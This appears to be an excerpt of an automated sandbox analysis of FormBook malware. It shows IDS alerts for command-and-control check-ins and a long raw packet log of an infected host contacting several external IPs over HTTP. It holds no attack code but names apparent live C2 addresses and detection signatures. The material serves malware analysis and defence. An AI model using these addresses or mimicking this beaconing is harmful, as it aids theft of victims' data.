              2024-09-06T09:07:39.405725+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49769 | 3.33.130.190 | 80 | TCP
              2024-09-06T09:07:46.035534+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49770 | 5.144.130.52 | 80 | TCP
              2024-09-06T09:07:48.582234+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49771 | 5.144.130.52 | 80 | TCP
              2024-09-06T09:07:51.129078+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49772 | 5.144.130.52 | 80 | TCP
              2024-09-06T09:08:01.970754+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49773 | 5.144.130.52 | 80 | TCP
              2024-09-06T09:08:01.970754+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49773 | 5.144.130.52 | 80 | TCP
              2024-09-06T09:08:07.624536+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49774 | 162.241.226.190 | 80 | TCP
              2024-09-06T09:08:10.175077+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49775 | 162.241.226.190 | 80 | TCP
              2024-09-06T09:08:12.769226+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49776 | 162.241.226.190 | 80 | TCP
              2024-09-06T09:08:15.289436+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49777 | 162.241.226.190 | 80 | TCP
              2024-09-06T09:08:15.289436+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49777 | 162.241.226.190 | 80 | TCP
              2024-09-06T09:08:21.131653+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49778 | 217.160.0.193 | 80 | TCP
              2024-09-06T09:08:23.701868+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49779 | 217.160.0.193 | 80 | TCP
              2024-09-06T09:08:26.330692+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49780 | 217.160.0.193 | 80 | TCP
              2024-09-06T09:08:30.166098+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49782 | 217.160.0.193 | 80 | TCP
              2024-09-06T09:08:30.166098+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49782 | 217.160.0.193 | 80 | TCP
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Sep 6, 2024 09:06:38.156514883 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.157470942 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:38.160900116 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.160964012 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.161005020 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.161034107 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:38.161497116 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:38.988558054 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.008234024 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.013293028 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.013370037 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.027431011 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.032289028 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.032390118 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600023031 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600044966 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600058079 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600079060 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600091934 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600102901 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600162029 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600159883 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.600177050 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600197077 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.600263119 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600281954 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600334883 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.600428104 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.605159044 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.605216980 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.605228901 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.605252981 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.605726957 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.686697960 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.686736107 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.686763048 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.687503099 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:41.535367966 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:42.554510117 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:42.559441090 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:42.559552908 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:42.567337036 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:42.572240114 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148684025 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148705006 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148716927 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148777962 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148783922 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.148789883 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148806095 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148818970 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148838997 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.148921967 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.148951054 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148963928 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148972988 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.149010897 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.149010897 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.153892994 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.153904915 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.153915882 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.154057026 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.154192924 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.154252052 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.237215996 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.237231016 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.237258911 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.237344027 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.237390041 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.243303061 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.248449087 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:48.546015024 CEST4975480192.168.2.691.215.85.23
              Sep 6, 2024 09:06:48.550975084 CEST804975491.215.85.23192.168.2.6
              Sep 6, 2024 09:06:48.551122904 CEST4975480192.168.2.691.215.85.23
              Sep 6, 2024 09:06:48.561974049 CEST4975480192.168.2.691.215.85.23
              Sep 6, 2024 09:06:48.566859961 CEST804975491.215.85.23192.168.2.6
              Sep 6, 2024 09:06:49.258800030 CEST804975491.215.85.23192.168.2.6
              Sep 6, 2024 09:06:49.258826971 CEST804975491.215.85.23192.168.2.6
              Sep 6, 2024 09:06:49.258887053 CEST4975480192.168.2.691.215.85.23
              Sep 6, 2024 09:06:50.066663027 CEST4975480192.168.2.691.215.85.23
              Sep 6, 2024 09:06:51.086873055 CEST4975580192.168.2.691.215.85.23
              Sep 6, 2024 09:06:51.092266083 CEST804975591.215.85.23192.168.2.6
              Sep 6, 2024 09:06:51.092339039 CEST4975580192.168.2.691.215.85.23
              Sep 6, 2024 09:06:51.107414007 CEST4975580192.168.2.691.215.85.23
              Sep 6, 2024 09:06:51.113291025 CEST804975591.215.85.23192.168.2.6
              Sep 6, 2024 09:06:52.613533020 CEST4975580192.168.2.691.215.85.23
              Sep 6, 2024 09:06:52.707994938 CEST804975591.215.85.23192.168.2.6
              Sep 6, 2024 09:06:53.633281946 CEST4975680192.168.2.691.215.85.23
              Sep 6, 2024 09:06:53.638190985 CEST804975691.215.85.23192.168.2.6
              Sep 6, 2024 09:06:53.638263941 CEST4975680192.168.2.691.215.85.23
              Sep 6, 2024 09:06:53.652947903 CEST4975680192.168.2.691.215.85.23
              Sep 6, 2024 09:06:53.657772064 CEST804975691.215.85.23192.168.2.6
              Sep 6, 2024 09:06:53.657882929 CEST804975691.215.85.23192.168.2.6
              Sep 6, 2024 09:06:54.344257116 CEST804975691.215.85.23192.168.2.6
              Sep 6, 2024 09:06:54.344285011 CEST804975691.215.85.23192.168.2.6
              Sep 6, 2024 09:06:54.344364882 CEST4975680192.168.2.691.215.85.23
              Sep 6, 2024 09:06:55.161209106 CEST4975680192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.179440022 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.184367895 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.185498953 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.192811012 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.197669983 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875104904 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875149965 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875161886 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875176907 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875185013 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875211954 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875226021 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875251055 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875262022 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875355005 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875391960 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.875391960 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.875441074 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.880250931 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.880306005 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.880317926 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.880371094 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.880412102 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.881525040 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.999675989 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.999687910 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.999763966 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.999861002 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.999974012 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.999974012 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:57.005136967 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:57.009888887 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:07:02.741434097 CEST4975880192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:02.746330976 CEST8049758121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:02.746403933 CEST4975880192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:02.758654118 CEST4975880192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:02.763634920 CEST8049758121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:04.273407936 CEST4975880192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:04.278733969 CEST8049758121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:04.279505014 CEST4975880192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:05.296504974 CEST4975980192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:05.301496983 CEST8049759121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:05.301558018 CEST4975980192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:05.315206051 CEST4975980192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:05.320095062 CEST8049759121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:06.426810980 CEST8049759121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:06.426831961 CEST8049759121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:06.426978111 CEST4975980192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:06.819713116 CEST4975980192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:07.836419106 CEST4976080192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:07.841417074 CEST8049760121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:07.841491938 CEST4976080192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:07.855396986 CEST4976080192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:07.861768961 CEST8049760121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:07.861920118 CEST8049760121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:09.026575089 CEST8049760121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:09.026618958 CEST8049760121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:09.026693106 CEST4976080192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:09.363502026 CEST4976080192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:10.383610010 CEST4976180192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:10.388492107 CEST8049761121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:10.388607025 CEST4976180192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:10.396234035 CEST4976180192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:10.401037931 CEST8049761121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:11.579998016 CEST8049761121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:11.580018044 CEST8049761121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:11.581505060 CEST4976180192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:11.583024025 CEST4976180192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:11.587893009 CEST8049761121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:12.465154886 CEST804975591.215.85.23192.168.2.6
              Sep 6, 2024 09:07:12.465363026 CEST4975580192.168.2.691.215.85.23
              Sep 6, 2024 09:07:16.929394960 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:16.934184074 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:16.937534094 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:16.949395895 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:16.954230070 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619527102 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619558096 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619573116 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619585991 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619609118 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:17.619613886 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619630098 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619636059 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:17.619647980 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619673014 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:17.619718075 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619765997 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:18.457338095 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:19.477448940 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:19.482708931 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:19.482774973 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:19.497196913 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:19.502038002 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122401953 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122430086 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122441053 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122453928 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122464895 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122479916 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122493029 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122543097 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122716904 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:20.122716904 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:21.004117966 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.022989988 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.027950048 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.028044939 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.038928986 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.046461105 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.046475887 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713160038 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713180065 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713191986 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713212013 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713228941 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713241100 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713243008 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.713254929 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713280916 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.713527918 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713536978 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.713774920 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:23.550992012 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:24.571403027 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:24.576298952 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:24.579582930 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:24.586982965 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:24.591809034 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218151093 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218178034 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218189955 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218200922 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218210936 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218221903 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218234062 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218312979 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.218353987 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.218358994 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218372107 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218384027 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218425035 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.218425035 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.223184109 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.223203897 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.223242998 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.305404902 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305438995 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305459976 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305473089 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305486917 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305512905 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.305512905 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.305762053 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305809975 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.305824041 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305835962 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305860043 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305879116 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.306363106 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.306418896 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.311950922 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.316770077 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:30.345396042 CEST4976680192.168.2.63.33.130.190
              Sep 6, 2024 09:07:30.350364923 CEST80497663.33.130.190192.168.2.6
              Sep 6, 2024 09:07:30.350502968 CEST4976680192.168.2.63.33.130.190
              Sep 6, 2024 09:07:30.361263990 CEST4976680192.168.2.63.33.130.190
              Sep 6, 2024 09:07:30.366177082 CEST80497663.33.130.190192.168.2.6
              Sep 6, 2024 09:07:30.821768999 CEST80497663.33.130.190192.168.2.6
              Sep 6, 2024 09:07:30.825609922 CEST4976680192.168.2.63.33.130.190
              Sep 6, 2024 09:07:31.863483906 CEST4976680192.168.2.63.33.130.190
              Sep 6, 2024 09:07:31.868375063 CEST80497663.33.130.190192.168.2.6
              Sep 6, 2024 09:07:32.883573055 CEST4976780192.168.2.63.33.130.190
              Sep 6, 2024 09:07:32.888789892 CEST80497673.33.130.190192.168.2.6
              Sep 6, 2024 09:07:32.891660929 CEST4976780192.168.2.63.33.130.190
              Sep 6, 2024 09:07:32.903429031 CEST4976780192.168.2.63.33.130.190
              Sep 6, 2024 09:07:32.908375978 CEST80497673.33.130.190192.168.2.6
              Sep 6, 2024 09:07:33.381902933 CEST80497673.33.130.190192.168.2.6
              Sep 6, 2024 09:07:33.381973028 CEST4976780192.168.2.63.33.130.190
              Sep 6, 2024 09:07:34.410998106 CEST4976780192.168.2.63.33.130.190
              Sep 6, 2024 09:07:34.420341015 CEST80497673.33.130.190192.168.2.6
              Sep 6, 2024 09:07:35.430211067 CEST4976880192.168.2.63.33.130.190
              Sep 6, 2024 09:07:35.435239077 CEST80497683.33.130.190192.168.2.6
              Sep 6, 2024 09:07:35.435326099 CEST4976880192.168.2.63.33.130.190
              Sep 6, 2024 09:07:35.448297977 CEST4976880192.168.2.63.33.130.190
              Sep 6, 2024 09:07:35.453202009 CEST80497683.33.130.190192.168.2.6
              Sep 6, 2024 09:07:35.453294992 CEST80497683.33.130.190192.168.2.6
              Sep 6, 2024 09:07:35.906856060 CEST80497683.33.130.190192.168.2.6
              Sep 6, 2024 09:07:35.906941891 CEST4976880192.168.2.63.33.130.190
              Sep 6, 2024 09:07:36.957247972 CEST4976880192.168.2.63.33.130.190
              Sep 6, 2024 09:07:36.962208986 CEST80497683.33.130.190192.168.2.6
              Sep 6, 2024 09:07:37.976974964 CEST4976980192.168.2.63.33.130.190
              Sep 6, 2024 09:07:37.982037067 CEST80497693.33.130.190192.168.2.6
              Sep 6, 2024 09:07:37.982117891 CEST4976980192.168.2.63.33.130.190
              Sep 6, 2024 09:07:37.989592075 CEST4976980192.168.2.63.33.130.190
              Sep 6, 2024 09:07:37.994688988 CEST80497693.33.130.190192.168.2.6
              Sep 6, 2024 09:07:39.405561924 CEST80497693.33.130.190192.168.2.6
              Sep 6, 2024 09:07:39.405599117 CEST80497693.33.130.190192.168.2.6
              Sep 6, 2024 09:07:39.405725002 CEST4976980192.168.2.63.33.130.190
              Sep 6, 2024 09:07:39.408957958 CEST4976980192.168.2.63.33.130.190
              Sep 6, 2024 09:07:39.413885117 CEST80497693.33.130.190192.168.2.6
              Sep 6, 2024 09:07:44.501033068 CEST4977080192.168.2.65.144.130.52
              Sep 6, 2024 09:07:44.508744955 CEST80497705.144.130.52192.168.2.6
              Sep 6, 2024 09:07:44.511543036 CEST4977080192.168.2.65.144.130.52
              Sep 6, 2024 09:07:44.522728920 CEST4977080192.168.2.65.144.130.52
              Sep 6, 2024 09:07:44.527635098 CEST80497705.144.130.52192.168.2.6
              Sep 6, 2024 09:07:46.035533905 CEST4977080192.168.2.65.144.130.52
              Sep 6, 2024 09:07:46.087918997 CEST80497705.144.130.52192.168.2.6
              Sep 6, 2024 09:07:47.057430029 CEST4977180192.168.2.65.144.130.52
              Sep 6, 2024 09:07:47.062319994 CEST80497715.144.130.52192.168.2.6
              Sep 6, 2024 09:07:47.062463999 CEST4977180192.168.2.65.144.130.52
              Sep 6, 2024 09:07:47.075408936 CEST4977180192.168.2.65.144.130.52
              Sep 6, 2024 09:07:47.080233097 CEST80497715.144.130.52192.168.2.6
              Sep 6, 2024 09:07:48.582233906 CEST4977180192.168.2.65.144.130.52
              Sep 6, 2024 09:07:48.631947041 CEST80497715.144.130.52192.168.2.6
              Sep 6, 2024 09:07:49.603183985 CEST4977280192.168.2.65.144.130.52
              Sep 6, 2024 09:07:49.608128071 CEST80497725.144.130.52192.168.2.6
              Sep 6, 2024 09:07:49.608202934 CEST4977280192.168.2.65.144.130.52
              Sep 6, 2024 09:07:49.625061035 CEST4977280192.168.2.65.144.130.52
              Sep 6, 2024 09:07:49.629882097 CEST80497725.144.130.52192.168.2.6
              Sep 6, 2024 09:07:49.630023003 CEST80497725.144.130.52192.168.2.6
              Sep 6, 2024 09:07:51.129077911 CEST4977280192.168.2.65.144.130.52
              Sep 6, 2024 09:07:51.175942898 CEST80497725.144.130.52192.168.2.6
              Sep 6, 2024 09:07:52.147599936 CEST4977380192.168.2.65.144.130.52
              Sep 6, 2024 09:07:52.152586937 CEST80497735.144.130.52192.168.2.6
              Sep 6, 2024 09:07:52.152692080 CEST4977380192.168.2.65.144.130.52
              Sep 6, 2024 09:07:52.159965992 CEST4977380192.168.2.65.144.130.52
